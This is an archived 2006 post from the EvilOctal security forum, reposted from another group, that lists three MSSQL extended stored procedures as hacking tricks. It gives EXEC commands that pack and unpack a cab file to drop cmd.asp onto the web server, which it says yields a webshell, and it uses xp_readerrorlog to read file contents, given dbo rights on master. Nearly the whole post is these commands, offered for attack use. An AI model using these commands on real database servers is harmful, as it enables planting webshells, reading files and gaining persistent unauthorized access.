邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-1-3 18:42

[转载]3个MSSQL扩展

文章作者:Superhei
信息来源:幻影旅团

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
打包
EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
解包,可以用于得到webshell
EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'
读文本代码

要求权限:
master的dbo权限

页: [1]
© 1999-2008 EvilOctal Security Team